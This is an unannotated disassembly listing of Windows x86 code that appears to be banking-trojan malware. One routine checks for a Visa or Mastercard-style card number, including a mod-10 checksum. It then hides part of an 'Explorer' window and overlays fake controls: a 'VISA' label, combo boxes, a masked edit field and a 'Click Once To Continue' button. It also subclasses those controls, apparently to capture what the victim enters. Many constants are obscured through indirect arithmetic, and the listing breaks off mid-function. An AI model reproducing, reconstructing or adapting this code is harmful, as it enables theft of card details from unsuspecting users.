var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10A = byte ptr -10Ah
var_108 = byte ptr -108h
var_105 = byte ptr -105h
var_104 = byte ptr -104h
var_102 = word ptr -102h
var_FF = byte ptr -0FFh
var_FE = byte ptr -0FEh
var_FB = byte ptr -0FBh
var_F9 = byte ptr -0F9h
var_F8 = byte ptr -0F8h
var_F7 = byte ptr -0F7h
var_F6 = byte ptr -0F6h
var_F4 = byte ptr -0F4h
var_F1 = byte ptr -0F1h
var_F0 = byte ptr -0F0h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 30Ch
push ebx
push esi
push edi
cmp [ebp+arg_4], 0
jz loc_441FC7
mov eax, [ebp+arg_0]
mov al, [eax]
cmp al, 34h
jz short loc_4410B5
cmp al, 35h
jnz loc_441FC7
loc_4410B5: ; CODE XREF: sub_44108E+1D�j
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_4410BD: ; CODE XREF: sub_44108E+34�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4410BD
mov [ebp+var_128], eax
mov edx, dword_44B0B4
add edx, 8
cmp eax, edx
jz short loc_4410E8
mov edx, dword_44B0A0
add edx, 0Fh
cmp eax, edx
jnz loc_441FC7
loc_4410E8: ; CODE XREF: sub_44108E+47�j
mov eax, dword_44B1A4
mov ebx, eax
add ebx, dword_44B12C
sub ebx, 5
jmp short loc_44111E
; ---------------------------------------------------------------------------
loc_4410FA: ; CODE XREF: sub_44108E+9B�j
mov eax, 30h
mul ebx
mov [ebp+var_260], eax
mov eax, [ebp+arg_4]
mov edx, [ebp+var_260]
cmp ds:dword_448370[edx], eax
jz loc_441FC7
inc ebx
loc_44111E: ; CODE XREF: sub_44108E+6A�j
mov eax, dword_44B0AC
lea eax, [eax+eax+5Eh]
cmp ebx, eax
jb short loc_4410FA
movsx eax, word_44B0B0
movsx edx, word_44B154
lea eax, [eax+edx+3]
cmp [ebp+var_128], eax
jnz loc_4412EA
mov eax, [ebp+arg_0]
mov al, [eax+4]
cmp al, 2Dh
jz short loc_44115B
cmp al, 20h
jnz loc_441FC7
loc_44115B: ; CODE XREF: sub_44108E+C3�j
mov eax, [ebp+arg_0]
mov al, [eax+9]
cmp al, 2Dh
jz short loc_44116D
cmp al, 20h
jnz loc_441FC7
loc_44116D: ; CODE XREF: sub_44108E+D5�j
mov eax, [ebp+arg_0]
mov al, [eax+0Eh]
cmp al, 2Dh
jz short loc_44117F
cmp al, 20h
jnz loc_441FC7
loc_44117F: ; CODE XREF: sub_44108E+E7�j
mov eax, dword_44B144
mov edx, [ebp+arg_0]
mov dl, [edx]
mov [ebp+eax+var_104], dl
movsx eax, word_44B19C
mov edx, eax
add edx, eax
mov eax, [ebp+arg_0]
mov al, [eax+1]
mov [ebp+edx+var_10A], al
mov eax, dword_44B1C4
add eax, dword_44B0E4
mov edx, [ebp+arg_0]
mov dl, [edx+2]
mov [ebp+eax+var_104], dl
mov eax, dword_44B09C
mov edx, [ebp+arg_0]
mov dl, [edx+3]
mov [ebp+eax+var_104], dl
mov eax, dword_44B198
add eax, dword_44B1B4
mov edx, [ebp+arg_0]
mov dl, [edx+5]
mov [ebp+eax+var_104], dl
mov eax, dword_44B0B8
mov edx, [ebp+arg_0]
mov dl, [edx+6]
mov [ebp+eax+var_FE], dl
mov eax, dword_44B1B0
mov edx, [ebp+arg_0]
mov dl, [edx+7]
mov [ebp+eax+var_F9], dl
mov eax, dword_44B1C0
mov edx, [ebp+arg_0]
mov dl, [edx+8]
mov [ebp+eax+var_FB], dl
movsx eax, word_44B194
mov edx, [ebp+arg_0]
mov dl, [edx+0Ah]
mov [ebp+eax+var_F7], dl
mov eax, dword_44B120
add eax, 3
movsx edx, word_44B110
add eax, edx
mov edx, [ebp+arg_0]
mov dl, [edx+0Bh]
mov [ebp+eax+var_FF], dl
movsx eax, word_44B168
movsx edx, word_44B0B0
add eax, edx
mov edx, [ebp+arg_0]
mov dl, [edx+0Ch]
mov [ebp+eax+var_105], dl
mov eax, dword_44B1A4
mov edx, [ebp+arg_0]
mov dl, [edx+0Dh]
mov [ebp+eax+var_F4], dl
mov eax, dword_44B11C
mov edx, [ebp+arg_0]
mov dl, [edx+0Fh]
mov [ebp+eax+var_F6], dl
movsx eax, word_44B110
mov edx, [ebp+arg_0]
mov dl, [edx+10h]
mov [ebp+eax+var_F6], dl
mov eax, dword_44B158
mov edx, [ebp+arg_0]
mov dl, [edx+11h]
mov [ebp+eax+var_F1], dl
mov eax, dword_44B138
mov edx, [ebp+arg_0]
mov dl, [edx+12h]
mov [ebp+eax+var_F8], dl
movsx eax, word_44B090
mov edx, dword_44B1C4
add edx, dword_44B0EC
sub edx, 0Ah
mov [ebp+eax+var_F0], dl
jmp short loc_4412F9
; ---------------------------------------------------------------------------
loc_4412EA: ; CODE XREF: sub_44108E+B5�j
push [ebp+arg_0]
lea eax, [ebp+var_FF]
push eax
call sub_444B60
loc_4412F9: ; CODE XREF: sub_44108E+25A�j
movsx esi, word_44B0DC
sub esi, 6
jmp short loc_44131A
; ---------------------------------------------------------------------------
loc_441305: ; CODE XREF: sub_44108E+29C�j
mov al, [ebp+esi+var_FF]
cmp al, 30h
jl short loc_441314
cmp al, 39h
jle short loc_441319
loc_441314: ; CODE XREF: sub_44108E+280�j
jmp loc_441FC7
; ---------------------------------------------------------------------------
loc_441319: ; CODE XREF: sub_44108E+284�j
inc esi
loc_44131A: ; CODE XREF: sub_44108E+275�j
mov eax, dword_44B1C0
add eax, 0Bh
add eax, dword_44B0F8
cmp esi, eax
jb short loc_441305
mov eax, dword_44B0E4
add eax, dword_44B164
sub eax, 2
mov [ebp-108h], eax
mov esi, dword_44B12C
sub esi, 5
jmp short loc_441391
; ---------------------------------------------------------------------------
loc_44134B: ; CODE XREF: sub_44108E+313�j
movsx eax, [ebp+esi+var_FF]
sub eax, 30h
movsx edx, word_44B0DC
add edx, dword_44B0A8
sub edx, 7
imul eax, edx
add [ebp-108h], eax
cmp [ebp+esi+var_FF], 34h
jle short loc_441385
mov eax, dword_44B09C
inc eax
sub [ebp-108h], eax
loc_441385: ; CODE XREF: sub_44108E+2E9�j
movsx eax, word_44B110
sub eax, 2
add esi, eax
loc_441391: ; CODE XREF: sub_44108E+2BB�j
mov eax, dword_44B190
add eax, 0Ch
add eax, dword_44B124
cmp esi, eax
jb short loc_44134B
movsx eax, word_44B168
mov ebx, eax
add ebx, dword_44B118
sub ebx, 8
jmp short loc_4413D4
; ---------------------------------------------------------------------------
loc_4413B7: ; CODE XREF: sub_44108E+350�j
movsx eax, [ebp+ebx+var_FF]
sub eax, 30h
add [ebp-108h], eax
movsx eax, word_44B1BC
sub eax, 4
add ebx, eax
loc_4413D4: ; CODE XREF: sub_44108E+327�j
mov eax, dword_44B12C
add eax, 0Bh
cmp ebx, eax
jb short loc_4413B7
mov eax, [ebp-108h]
mov ecx, 0Ah
xor edx, edx
div ecx
movsx edi, word_44B1A8
add edi, dword_44B108
cmp edx, edi
jnz loc_441FC7
lea eax, [ebp+var_FF]
push eax
call ds:dword_44A774
pop ecx
or eax, eax
jnz loc_441FC7
mov eax, dword_44B0C0
movsx edx, word_44B154
mov esi, eax
add esi, edx
sub esi, 9
mov esi, dword_44B190
sub esi, 3
jmp short loc_441450
; ---------------------------------------------------------------------------
loc_441438: ; CODE XREF: sub_44108E+3D5�j
mov eax, 30h
mul esi
mov [ebp+var_264], eax
cmp ds:dword_448370[eax], 0
jz short loc_441465
inc esi
loc_441450: ; CODE XREF: sub_44108E+3A8�j
mov eax, dword_44B174
add eax, 5Bh
movsx edx, word_44B1A8
add eax, edx
cmp esi, eax
jb short loc_441438
loc_441465: ; CODE XREF: sub_44108E+3BF�j
mov eax, dword_44B13C
add eax, 62h
cmp esi, eax
jz loc_441FC7
mov eax, 30h
mul esi
mov [ebp+var_268], eax
mov eax, [ebp+arg_4]
mov edx, [ebp+var_268]
mov ds:dword_448370[edx], eax
push offset word_44BEFE
call sub_4424C1
pop ecx
push 0
push eax
push 0
push [ebp+arg_4]
call ds:dword_44A638 ; FindWindowExA
mov [ebp+var_134], eax
test eax, eax
jnz short loc_4414BE
mov eax, [ebp+arg_4]
mov [ebp+var_134], eax
loc_4414BE: ; CODE XREF: sub_44108E+425�j
push offset asc_44BEF1 ; "\t"
call sub_4424C1
push eax
push [ebp+var_134]
call sub_43D7F1
mov [ebp+var_12C], eax
push offset aExplorer ; "Explorer"
push eax
call sub_43D7F1
add esp, 14h
mov [ebp+var_26C], eax
mov eax, 30h
mul esi
mov [ebp+var_270], eax
mov edi, [ebp+var_26C]
mov ebx, eax
mov ds:dword_448374[ebx], edi
push 0
mov eax, 30h
mul esi
mov [ebp+var_274], eax
push ds:dword_448374[eax]
call ds:dword_44A658 ; ShowWindow
lea eax, [ebp+var_11C]
push eax
push [ebp+var_12C]
call ds:dword_44A650 ; GetWindowRect
push 0
call ds:dword_4475E8 ; GetModuleHandleA
mov [ebp-10Ch], eax
push 0
push eax
push 0
push [ebp+var_12C]
mov eax, [ebp+var_110]
sub eax, [ebp+var_118]
push eax
mov eax, [ebp+var_114]
sub eax, [ebp+var_11C]
push eax
mov eax, dword_44B0FC
add eax, dword_44B1B4
sub eax, 8
push eax
mov eax, dword_44B124
dec eax
push eax
push 50800000h
lea eax, [ebp+var_FF]
push eax
push offset aKkqVx ; "kkq-vx"
push 200h
call ds:dword_449648 ; CreateWindowExA
mov [ebp+var_278], eax
mov eax, 30h
mul esi
mov [ebp+var_27C], eax
mov edi, [ebp+var_278]
mov ebx, eax
mov ds:dword_448378[ebx], edi
mov edi, [ebp+var_110]
sub edi, [ebp+var_118]
mov ebx, dword_44B0CC
add ebx, 0F9h
sub edi, ebx
mov ebx, dword_44B124
add ebx, 34h
add ebx, dword_44B10C
mov eax, edi
sub eax, ebx
xor edx, edx
test eax, eax
setl dl
add eax, edx
sar eax, 1
mov [ebp+var_124], eax
mov eax, dword_44B0F0
movsx edx, word_44B0DC
add eax, edx
sub eax, 0Ah
cmp [ebp+var_124], eax
jge short loc_441625
mov eax, dword_44B14C
sub eax, 5
mov [ebp+var_124], eax
loc_441625: ; CODE XREF: sub_44108E+587�j
mov eax, [ebp+var_114]
sub eax, [ebp+var_11C]
movsx edx, word_44B0D8
add edx, 28h
sub eax, edx
mov [ebp+var_120], eax
push offset byte_44BED7
call sub_4424C1
mov [ebp+var_280], eax
push offset word_44BEBE
call sub_4424C1
mov [ebp+var_284], eax
push 0
push dword ptr [ebp-10Ch]
push 0
mov eax, 30h
mul esi
mov [ebp+var_288], eax
mov edi, eax
push ds:dword_448378[edi]
mov edi, dword_44B14C
add edi, 36h
push edi
push [ebp+var_120]
push [ebp+var_124]
mov edi, dword_44B0C0
add edi, 13h
add edi, dword_44B130
push edi
push 50800000h
mov edi, [ebp+var_284]
push edi
mov edi, [ebp+var_280]
push edi
movsx edi, word_44B194
add edi, dword_44B0F8
sub edi, 2
push edi
call ds:dword_449648 ; CreateWindowExA
mov [ebp+var_138], eax
push offset dword_44BEB4
call sub_4424C1
mov [ebp+var_28C], eax
push offset dword_44BEB0
call sub_4424C1
add esp, 10h
mov [ebp+var_290], eax
push 0
push dword ptr [ebp-10Ch]
push 0
mov eax, 30h
mul esi
mov [ebp+var_294], eax
mov edi, eax
push ds:dword_448378[edi]
movsx edi, word_44B0E0
mov ebx, dword_44B15C
lea edi, [edi+ebx+0F6h]
push edi
push [ebp+var_120]
mov edi, [ebp+var_124]
mov ebx, dword_44B12C
add ebx, 30h
movsx edx, word_44B0C8
add ebx, edx
add edi, ebx
mov ebx, dword_44B130
inc ebx
add edi, ebx
push edi
movsx edi, word_44B194
add edi, 14h
push edi
push 50800009h
mov edi, [ebp+var_290]
push edi
mov edi, [ebp+var_28C]
push edi
mov edi, dword_44B0B4
add edi, dword_44B1B4
sub edi, 9
push edi
call ds:dword_449648 ; CreateWindowExA
mov [ebp+var_13C], eax
push 0
push 2
push 0
push 0
push 5
push 1
mov eax, dword_44B1B4
dec eax
push eax
mov eax, dword_44B118
add eax, dword_44B174
sub eax, 0Ah
push eax
mov eax, dword_44B0B8
movsx edx, word_44B0E8
add eax, edx
sub eax, 9
push eax
push 2BCh
mov eax, dword_44B17C
movsx edx, word_44B128
add eax, edx
sub eax, 6
push eax
mov eax, dword_44B10C
add eax, dword_44B178
sub eax, 0Ah
push eax
movsx eax, word_44B16C
add eax, 4
push eax
mov eax, dword_44B164
add eax, 10h
add eax, dword_44B0A0
push eax
call ds:dword_448250 ; CreateFontA
mov [ebp+var_140], eax
push 1
push eax
push 30h
push [ebp+var_138]
call ds:dword_445014 ; SendMessageA
push 0
push dword ptr [ebp-10Ch]
push 0
push [ebp+var_13C]
mov eax, dword_44B0F0
add eax, 0EDh
add eax, dword_44B174
movsx edx, word_44B168
sub edx, 4
sub eax, edx
push eax
mov eax, [ebp+var_120]
mov edx, dword_44B1B8
movsx ecx, word_44B0BC
add edx, ecx
sub edx, 8
sub eax, edx
push eax
movsx eax, word_44B1BC
add eax, dword_44B11C
sub eax, 8
push eax
mov eax, dword_44B0EC
sub eax, 4
push eax
push 50000000h
push offset asc_44BEA7 ; " "
push offset aStatic ; "STATIC"
mov eax, dword_44B0B4
sub eax, 8
push eax
call ds:dword_449648 ; CreateWindowExA
mov [ebp+var_298], eax
mov eax, 30h
mul esi
mov [ebp+var_29C], eax
mov edi, [ebp+var_298]
mov ebx, eax
mov ds:dword_44837C[ebx], edi
mov eax, dword_44B0A4
movsx edx, word_44B0C8
add eax, edx
cmp [ebp+eax+var_108], 34h
jnz short loc_4418F3
push offset aVisa ; "VISA"
lea eax, [ebp+var_253]
push eax
call sub_444B60
jmp short loc_44190B
; ---------------------------------------------------------------------------
loc_4418F3: ; CODE XREF: sub_44108E+850�j
push offset asc_44BE94 ; "\n"
call sub_4424C1
pop ecx
push eax
lea edi, [ebp+var_253]
push edi
call sub_444B60
loc_44190B: ; CODE XREF: sub_44108E+863�j
push offset word_44BE22
call sub_4424C1
lea edi, [ebp+var_FF]
push edi
lea edi, [ebp+var_253]
push edi
push eax
lea edi, [ebp+var_23F]
push edi
call ds:dword_44A634
push offset dword_44BE18
call sub_4424C1
add esp, 18h
mov [ebp+var_2A0], eax
push 0
push dword ptr [ebp-10Ch]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2A4], eax
mov edi, eax
push ds:dword_44837C[edi]
mov edi, dword_44B144
add edi, 2Bh
push edi
push [ebp+var_120]
mov edi, dword_44B190
add edi, 7
push edi
mov edi, dword_44B1C4
add edi, 5
push edi
push 50000000h
lea edi, [ebp+var_23F]
push edi
mov edi, [ebp+var_2A0]
push edi
mov edi, dword_44B098
movsx ebx, word_44B0D8
add edi, ebx
sub edi, 0Ch
push edi
call ds:dword_449648 ; CreateWindowExA
mov [ebp+var_258], eax
push 0
push 2
push 0
push 0
push 5
push 1
mov eax, dword_44B0B8
sub eax, 4
push eax
mov eax, dword_44B158
add eax, dword_44B18C
dec eax
push eax
movsx eax, word_44B100
sub eax, 9
push eax
push 190h
mov eax, dword_44B198
sub eax, 8
push eax
mov eax, dword_44B0C4
sub eax, 4
push eax
movsx eax, word_44B168
sub eax, 2
push eax
mov eax, dword_44B0A8
add eax, 9
movsx edx, word_44B110
add eax, edx
push eax
call ds:dword_448250 ; CreateFontA
mov [ebp+var_130], eax
push 1
push eax
push 30h
push [ebp+var_258]
call ds:dword_445014 ; SendMessageA
push 0
push dword ptr [ebp-10Ch]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2A8], eax
mov [ebp+var_2AC], eax
push ds:dword_44837C[eax]
mov edx, dword_44B0FC
add edx, 121h
add edx, dword_44B0B8
push edx
mov edx, dword_44B0EC
movsx ecx, word_44B100
lea ecx, [ecx+edx+24h]
push ecx
mov ecx, dword_44B1B0
mov ebx, dword_44B094
add ebx, 45h
add ebx, ecx
push ebx
mov ebx, dword_44B174
inc ebx
push ebx
push 50800003h
push offset byte_44BE0E
push offset aCombobox ; "COMBOBOX"
add edx, ecx
sub edx, 5
push edx
call ds:dword_449648 ; CreateWindowExA
mov edi, [ebp+var_2AC]
mov ds:dword_448380[edi], eax
push 0
push dword ptr [ebp-10Ch]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2B0], eax
mov [ebp+var_2B4], eax
push ds:dword_44837C[eax]
movsx edx, word_44B110
mov ecx, dword_44B108
lea edx, [edx+ecx+128h]
push edx
movsx edx, word_44B0B0
mov ecx, dword_44B0F0
lea edx, [edx+ecx+30h]
push edx
movsx edx, word_44B0E8
mov ecx, dword_44B0E4
add ecx, 44h
add ecx, edx
push ecx
mov ecx, dword_44B104
add ecx, 3Eh
add ecx, edx
push ecx
push 50800003h
push offset byte_44BE0E
push offset aCombobox ; "COMBOBOX"
movsx edx, word_44B148
sub edx, 3
push edx
call ds:dword_449648 ; CreateWindowExA
mov edi, [ebp+var_2B4]
mov ds:dword_448384[edi], eax
mov eax, dword_44B134
add eax, dword_44B120
sub eax, 4
mov [ebp+var_102], ax
jmp loc_441C28
; ---------------------------------------------------------------------------
loc_441B74: ; CODE XREF: sub_44108E+BAC�j
push offset word_44BE06
call sub_4424C1
movzx edi, [ebp+var_102]
push edi
push eax
lea edi, [ebp+var_2BE]
push edi
call ds:dword_44A634
lea eax, [ebp+var_2BE]
push eax
mov eax, dword_44B0B8
add eax, dword_44B0B4
sub eax, 0Ch
push eax
push 143h
mov eax, 30h
mul esi
mov [ebp+var_2C4], eax
push ds:dword_448380[eax]
call ds:dword_445014 ; SendMessageA
push offset dword_44BDFC
call sub_4424C1
movzx edi, [ebp+var_102]
mov ebx, dword_44B0EC
inc ebx
add edi, ebx
push edi
push eax
lea edi, [ebp+var_2BE]
push edi
call ds:dword_44A634
add esp, 20h
lea eax, [ebp+var_2BE]
push eax
push dword_44B130
push 143h
mov eax, 30h
mul esi
mov [ebp+var_2C8], eax
push ds:dword_448384[eax]
call ds:dword_445014 ; SendMessageA
inc [ebp+var_102]
loc_441C28: ; CODE XREF: sub_44108E+AE1�j
movzx eax, [ebp+var_102]
mov edx, dword_44B1A4
add edx, 0Dh
cmp eax, edx
jl loc_441B74
push 0
push dword ptr [ebp-10Ch]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2B8], eax
mov [ebp+var_2BC], eax
push ds:dword_44837C[eax]
movsx edx, word_44B110
add edx, 14h
push edx
mov edx, dword_44B138
add edx, 4Dh
movsx ecx, word_44B0E0
add edx, ecx
push edx
movsx edx, word_44B0D8
add edx, 77h
push edx
movsx edx, word_44B19C
add edx, 29h
push edx
push 50800000h
push offset byte_44BE0E
push offset aEdit ; "EDIT"
push 200h
call ds:dword_449648 ; CreateWindowExA
mov edi, [ebp+var_2BC]
mov ds:dword_448388[edi], eax
movsx eax, word_44B0BC
add eax, dword_44B0AC
sub eax, 0Ch
push eax
push 58h
push 0CCh
mov eax, 30h
mul esi
mov [ebp-2C0h], eax
push ds:dword_448388[eax]
call ds:dword_445014 ; SendMessageA
push offset byte_44BDED
call sub_4424C1
mov [ebp+var_2C4], eax
push offset byte_44BDCB
call sub_4424C1
add esp, 8
mov [ebp+var_2C8], eax
push 0
push dword ptr [ebp-10Ch]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2CC], eax
mov edi, eax
push ds:dword_44837C[edi]
mov edi, dword_44B138
add edi, 38h
add edi, dword_44B1B0
push edi
push [ebp+var_120]
movsx edi, word_44B154
add edi, 47h
push edi
movsx edi, word_44B0F4
movsx ebx, word_44B148
lea edi, [edi+ebx+8Ah]
push edi
push 50000000h
mov edi, [ebp+var_2C8]
push edi
mov edi, [ebp+var_2C4]
push edi
mov edi, dword_44B0FC
movsx ebx, word_44B16C
add edi, ebx
sub edi, 0Bh
push edi
call ds:dword_449648 ; CreateWindowExA
mov [ebp+var_25C], eax
push 1
push [ebp+var_130]
push 30h
push eax
call ds:dword_445014 ; SendMessageA
push 0
push dword ptr [ebp-10Ch]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2D0], eax
mov [ebp+var_2D4], eax
push ds:dword_44837C[eax]
mov edx, dword_44B178
add edx, 14h
push edx
mov edx, dword_44B188
add edx, 93h
add edx, dword_44B198
push edx
mov edx, dword_44B14C
add edx, 0EDh
add edx, dword_44B098
mov ecx, dword_44B0F0
add ecx, 1Fh
sub edx, ecx
push edx
mov edx, dword_44B13C
add edx, 8
push edx
push 50800000h
push offset aClickOnceToCon ; "Click Once To Continue"
push offset aButton ; "BUTTON"
mov edx, dword_44B1C0
add edx, dword_44B0C4
sub edx, 7
push edx
call ds:dword_449648 ; CreateWindowExA
mov edi, [ebp+var_2D4]
mov ds:dword_44838C[edi], eax
push 1
push [ebp+var_130]
mov eax, 30h
push 30h
mul esi
mov [ebp+var_2D8], eax
push ds:dword_44838C[eax]
call ds:dword_445014 ; SendMessageA
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2DC], eax
mov [ebp+var_2E0], eax
push ds:dword_448380[eax]
call ds:dword_44A628 ; GetWindowLongA
mov edi, [ebp+var_2E0]
mov ds:dword_448390[edi], eax
push offset sub_43A34D
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2E4], eax
push ds:dword_448380[eax]
call ds:dword_4475F8 ; SetWindowLongA
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2E8], eax
mov [ebp+var_2EC], eax
push ds:dword_448384[eax]
call ds:dword_44A628 ; GetWindowLongA
mov edi, [ebp+var_2EC]
mov ds:dword_448394[edi], eax
push offset sub_43A34D
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2F0], eax
push ds:dword_448384[eax]
call ds:dword_4475F8 ; SetWindowLongA
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2F4], eax
mov [ebp+var_2F8], eax
push ds:dword_448388[eax]
call ds:dword_44A628 ; GetWindowLongA
mov edi, [ebp+var_2F8]
mov ds:dword_448398[edi], eax
push offset sub_43A34D
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2FC], eax
push ds:dword_448388[eax]
call ds:dword_4475F8 ; SetWindowLongA
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_300], eax
mov [ebp+var_304], eax
push ds:dword_44837C[eax]
call ds:dword_44A628 ; GetWindowLongA
mov edi, [ebp+var_304]
mov ds:dword_44839C[edi], eax
push offset sub_43A34D
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_308], eax
push ds:dword_44837C[eax]
call ds:dword_4475F8 ; SetWindowLongA
mov eax, 30h
mul esi
mov [ebp+var_30C], eax
push ds:dword_448380[eax]
call ds:dword_447A40 ; SetFocus
loc_441FC7: ; CODE XREF: sub_44108E+10�j
; sub_44108E+21�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_44108E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_441FCC proc near ; CODE XREF: sub_43B52C+1C4�p
; sub_43C154+20�p ...
var_120A = byte ptr -120Ah
var_110B = byte ptr -110Bh
var_100C = dword ptr -100Ch
var_1008 = dword ptr -1008h
var_1004 = dword ptr -1004h
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 120Ch
call sub_444B40
push ebx
push esi
push edi
push offset word_44B97E
call sub_4424C1
push eax
lea edi, [ebp+var_FFF]
push edi
call ds:dword_44A634
add esp, 0Ch
mov eax, dword_44B0EC
mov esi, eax
add esi, dword_44B144
sub esi, 0Ah
jmp short loc_442029
; ---------------------------------------------------------------------------
loc_442009: ; CODE XREF: sub_441FCC+63�j
cmp [ebp+esi+var_FFF], 23h
jnz short loc_442028
mov eax, dword_44B0F8
add eax, dword_44B118
sub eax, 3
mov [ebp+esi+var_FFF], al
loc_442028: ; CODE XREF: sub_441FCC+45�j
inc esi
loc_442029: ; CODE XREF: sub_441FCC+3B�j
cmp esi, 0FFFh
jb short loc_442009
mov eax, dword_44B0F8
add eax, dword_44B184
sub eax, 8
mov [ebp+var_1004], eax
mov eax, dword_44B108
mov ebx, eax
add ebx, dword_44B12C
sub ebx, 5
cmp [ebp+arg_0], 0
jnz short loc_4420B4
loc_44205B: ; CODE XREF: sub_441FCC+E6�j
mov eax, [ebp+arg_4]
cmp [ebp+var_1004], eax
jnz short loc_44207D
lea eax, [ebp+ebx+var_FFF]
push eax
push offset dword_44A670
call sub_444B60
jmp loc_442313
; ---------------------------------------------------------------------------
loc_44207D: ; CODE XREF: sub_441FCC+98�j
lea ecx, [ebp+ebx+var_FFF]
or eax, 0FFFFFFFFh
loc_442087: ; CODE XREF: sub_441FCC+C0�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_442087
add ebx, eax
add ebx, 1
inc [ebp+var_1004]
movsx eax, [ebp+ebx+var_FFF]
mov edx, dword_44B1A0
sub edx, 6
cmp eax, edx
jz loc_442313
jmp short loc_44205B
; ---------------------------------------------------------------------------
loc_4420B4: ; CODE XREF: sub_441FCC+8D�j
mov eax, dword_44B290
mov [ebp+var_1008], eax
mov eax, dword_44B094
movsx edx, word_44B0E0
add eax, edx
sub eax, 6
mov edx, [ebp+arg_0]
movsx ecx, word_44B090
dec ecx
mov [edx+eax], cl
movsx eax, word_44B180
movsx edx, word_44B1A8
mov ebx, eax
add ebx, edx
sub ebx, 6
mov eax, dword_44B1A4
mov [ebp+var_1004], eax
loc_4420FE: ; CODE XREF: sub_441FCC+31F�j
push offset byte_44B973
call sub_4424C1
push eax
lea edi, [ebp+var_110B]
push edi
call sub_444B60
lea eax, [ebp+ebx+var_FFF]
push eax
lea eax, [ebp+var_110B]
push eax
call ds:dword_445020
add esp, 0Ch
call ds:dword_44ABAC
mov ecx, 14h
cdq
idiv ecx
mov [ebp+var_100C], edx
mov eax, dword_44B0B4
sub eax, 6
cmp edx, eax
jnb loc_442236
push [ebp+var_1008]
lea eax, [ebp+var_120A]
push eax
call sub_43E1CC
mov eax, dword_44B198
add eax, dword_44B0D4
sub eax, 8
push eax
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call sub_43D744
add esp, 14h
mov edi, dword_44B0B8
add edi, 0FFF3h
movsx edx, word_44B0B0
add edi, edx
cmp eax, edi
jnz short loc_4421C4
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call ds:dword_445020
push offset word_44B96E
call sub_4424C1
push eax
push [ebp+arg_0]
call ds:dword_445020
add esp, 14h
loc_4421C4: ; CODE XREF: sub_441FCC+1CF�j
mov eax, dword_44B17C
sub eax, 5
push eax
lea eax, [ebp+var_120A]
push eax
push [ebp+arg_0]
call sub_43D744
add esp, 0Ch
mov edi, dword_44B164
add edi, 0FFFDh
add edi, dword_44B1C8
cmp eax, edi
jnz short loc_442230
push offset byte_44B963
call sub_4424C1
push eax
push [ebp+arg_0]
call ds:dword_445020
lea eax, [ebp+var_120A]
push eax
push [ebp+arg_0]
call ds:dword_445020
push offset word_44B95E
call sub_4424C1
push eax
push [ebp+arg_0]
call ds:dword_445020
add esp, 20h
loc_442230: ; CODE XREF: sub_441FCC+227�j
inc [ebp+var_1008]
loc_442236: ; CODE XREF: sub_441FCC+17F�j
push [ebp+var_1004]
call sub_443D23
pop ecx
mov [ebp+var_100C], eax
mov ecx, dword_44B0B4
sub ecx, 6
cmp eax, ecx
jnb short loc_4422B6
mov eax, dword_44B184
movsx edx, word_44B154
add eax, edx
sub eax, 0Dh
push eax
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call sub_43D744
add esp, 0Ch
mov edi, dword_44B160
add edi, 0FFF4h
add edi, dword_44B1B8
cmp eax, edi
jnz short loc_4422B6
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call ds:dword_445020
push offset byte_44B959
call sub_4424C1
push eax
push [ebp+arg_0]
call ds:dword_445020
add esp, 14h
loc_4422B6: ; CODE XREF: sub_441FCC+287�j
; sub_441FCC+2C1�j
lea ecx, [ebp+ebx+var_FFF]
or eax, 0FFFFFFFFh
loc_4422C0: ; CODE XREF: sub_441FCC+2F9�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4422C0
add ebx, eax
add ebx, 1
inc [ebp+var_1004]
movsx eax, [ebp+ebx+var_FFF]
mov edx, dword_44B0A4
add edx, dword_44B13C
sub edx, 4
cmp eax, edx
jnz loc_4420FE
push offset dword_44B954
call sub_4424C1
push eax
push [ebp+arg_0]
call ds:dword_445020
add esp, 0Ch
mov eax, [ebp+var_1008]
mov dword_44B290, eax
loc_442313: ; CODE XREF: sub_441FCC+AC�j
; sub_441FCC+E0�j
pop edi
pop esi
pop ebx
leave
retn
sub_441FCC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_442318 proc near ; DATA XREF: sub_440914+1F�o
var_1FFF = byte ptr -1FFFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 2000h
call sub_444B40
push esi
push edi
push 1FFFh
lea eax, [ebp+var_1FFF]
push eax
push [ebp+arg_0]
call ds:dword_44ABA4 ; GetWindowTextA
push offset byte_44B93F
call sub_4424C1
mov edi, dword_44B0E4
dec edi
push edi
push eax
lea edi, [ebp+var_1FFF]
push edi
call sub_43D744
add esp, 10h
mov esi, dword_44B1C0
add esi, 0FFF8h
add esi, dword_44B1AC
cmp eax, esi
jz short loc_44237D
push [ebp+arg_0]
call sub_43EEA0
pop ecx
loc_44237D: ; CODE XREF: sub_442318+5A�j
